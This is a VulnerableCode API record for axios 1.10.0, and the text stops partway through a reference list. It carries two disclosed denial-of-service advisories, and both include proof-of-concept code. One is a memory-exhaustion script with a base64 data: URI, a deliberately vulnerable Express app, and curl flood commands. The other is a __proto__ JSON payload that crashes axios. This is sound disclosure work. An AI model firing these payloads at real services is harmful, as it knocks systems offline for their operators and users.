VulnerableCode.io REST API

Lookup for vulnerable packages by Package URL.

GET /api/packages/70535?format=api

HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/70535?format=api",
    "purl": "pkg:npm/axios@1.10.0",
    "type": "npm",
    "namespace": "",
    "name": "axios",
    "version": "1.10.0",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "1.13.5",
    "latest_non_vulnerable_version": "1.15.0",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/25655?format=api",
            "vulnerability_id": "VCID-aq84-8cnz-byax",
            "summary": "Axios is vulnerable to DoS attack through lack of data size check\n## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === 'data:') {\n  let convertedData;\n  if (method !== 'GET') {\n    return settle(resolve, reject, { status: 405, ... });\n  }\n  convertedData = fromDataURI(config.url, responseType === 'blob', {\n    Blob: config.env && config.env.Blob\n  });\n  return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n  ...\n  if (protocol === 'data') {\n    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n    const match = DATA_URL_PATTERN.exec(uri);\n    ...\n    const body = match[3];\n    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');\n    if (asBlob) { return new _Blob([buffer], {type: mime}); }\n    return buffer;\n  }\n  throw new AxiosError('Unsupported protocol ' + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require('axios');\n\nasync function main() {\n  // this example decodes ~120 MB\n  const base64Size = 160_000_000; // 120 MB after decoding\n  const base64 = 'A'.repeat(base64Size);\n  const uri = 'data:application/octet-stream;base64,' + base64;\n\n  console.log('Generating URI with base64 length:', base64.length);\n  const response = await axios.get(uri, {\n    responseType: 'arraybuffer'\n  });\n\n  console.log('Received bytes:', response.data.length);\n}\n\nmain().catch(err => {\n  console.error('Error:', err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n<--- Last few GCs --->\n…\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x… node::Abort() …\n…\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n  timeout: 10000,\n  maxRedirects: 5,\n  httpAgent, httpsAgent,\n  headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n  validateStatus: c => c >= 200 && c < 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=>res.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"<http|https|data URL>\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) => {\n  const url = req.body?.url;\n  if (!url) return res.status(400).json({ error: \"missing url\" });\n\n  let u;\n  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n  // Developer allows using data:// in the allowlist\n  const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n  if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n  const controller = new AbortController();\n  const onClose = () => controller.abort();\n  res.on(\"close\", onClose);\n\n  const before = process.memoryUsage().heapUsed;\n\n  try {\n    const r = await axiosClient.get(u.toString(), {\n      responseType: \"stream\",\n      maxContentLength: 8 * 1024, // Axios will ignore this for data:\n      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:\n      signal: controller.signal\n    });\n\n    // stream only the first 64KB back\n    const cap = 64 * 1024;\n    let sent = 0;\n    const limiter = new PassThrough();\n    r.data.on(\"data\", (chunk) => {\n      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }\n      else { sent += chunk.length; limiter.write(chunk); }\n    });\n    r.data.on(\"end\", () => limiter.end());\n    r.data.on(\"error\", (e) => limiter.destroy(e));\n\n    const after = process.memoryUsage().heapUsed;\n    res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n    limiter.pipe(res);\n  } catch (err) {\n    const after = process.memoryUsage().heapUsed;\n    res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n    res.status(502).json({ error: String(err?.message || err) });\n  } finally {\n    res.off(\"close\", onClose);\n  }\n});\n\napp.listen(PORT, () => {\n  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))' \\\n| tee payload.json >/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n   For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. **Stream decoding**\n   Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.",
            "references": [
                {
                    "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        }
                    ],
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json"
                },
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-58754",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00113",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29896",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00113",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29756",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00113",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29944",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34373",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34392",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34629",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34669",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34158",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.00144",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34289",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35614",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35637",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.3568",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35671",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35648",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35654",
                            "published_at": "2026-04-16T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-58754"
                },
                {
                    "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754"
                },
                {
                    "reference_url": "https://github.com/axios/axios",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/axios/axios"
                },
                {
                    "reference_url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
                },
                {
                    "reference_url": "https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67"
                },
                {
                    "reference_url": "https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06"
                },
                {
                    "reference_url": "https://github.com/axios/axios/pull/7011",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/pull/7011"
                },
                {
                    "reference_url": "https://github.com/axios/axios/pull/7034",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/pull/7034"
                },
                {
                    "reference_url": "https://github.com/axios/axios/releases/tag/v0.30.2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/releases/tag/v0.30.2"
                },
                {
                    "reference_url": "https://github.com/axios/axios/releases/tag/v1.12.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/releases/tag/v1.12.0"
                },
                {
                    "reference_url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
                },
                {
                    "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963",
                    "reference_id": "1114963",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963"
                },
                {
                    "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735",
                    "reference_id": "2394735",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4hjh-wcwx-xvwj",
                    "reference_id": "GHSA-4hjh-wcwx-xvwj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4hjh-wcwx-xvwj"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:16747",
                    "reference_id": "RHSA-2025:16747",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:16747"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:18252",
                    "reference_id": "RHSA-2025:18252",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:18252"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:19221",
                    "reference_id": "RHSA-2025:19221",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:19221"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:19375",
                    "reference_id": "RHSA-2025:19375",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:19375"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:19529",
                    "reference_id": "RHSA-2025:19529",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:19529"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:19804",
                    "reference_id": "RHSA-2025:19804",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:19804"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:22759",
                    "reference_id": "RHSA-2025:22759",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:22759"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:23069",
                    "reference_id": "RHSA-2025:23069",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:23069"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:23131",
                    "reference_id": "RHSA-2025:23131",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:23131"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2025:23546",
                    "reference_id": "RHSA-2025:23546",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2025:23546"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:1018",
                    "reference_id": "RHSA-2026:1018",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:1018"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:1942",
                    "reference_id": "RHSA-2026:1942",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:1942"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:4215",
                    "reference_id": "RHSA-2026:4215",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:4215"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6226",
                    "reference_id": "RHSA-2026:6226",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6226"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/68901?format=api",
                    "purl": "pkg:npm/axios@1.12.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-x41s-g5mh-pkdq"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.12.0"
                }
            ],
            "aliases": [
                "CVE-2025-58754",
                "GHSA-4hjh-wcwx-xvwj"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aq84-8cnz-byax"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20921?format=api",
            "vulnerability_id": "VCID-x41s-g5mh-pkdq",
            "summary": "Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig\n# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n  const merge = mergeMap[prop] || mergeDeepProperties;\n  const configValue = merge(config1[prop], config2[prop], prop);\n  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n    at computeConfigValue (lib/core/mergeConfig.js:100:25)\n    at Object.forEach (lib/utils.js:280:10)\n    at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.",
            "references": [
                {
                    "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        }
                    ],
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json"
                },
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25639",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15623",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15752",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15795",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15798",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1578",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15744",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1582",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1594",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15888",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15802",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15889",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15927",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16003",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1595",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16649",
                            "published_at": "2026-04-18T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25639"
                },
                {
                    "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639"
                },
                {
                    "reference_url": "https://github.com/axios/axios",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/axios/axios"
                },
                {
                    "reference_url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
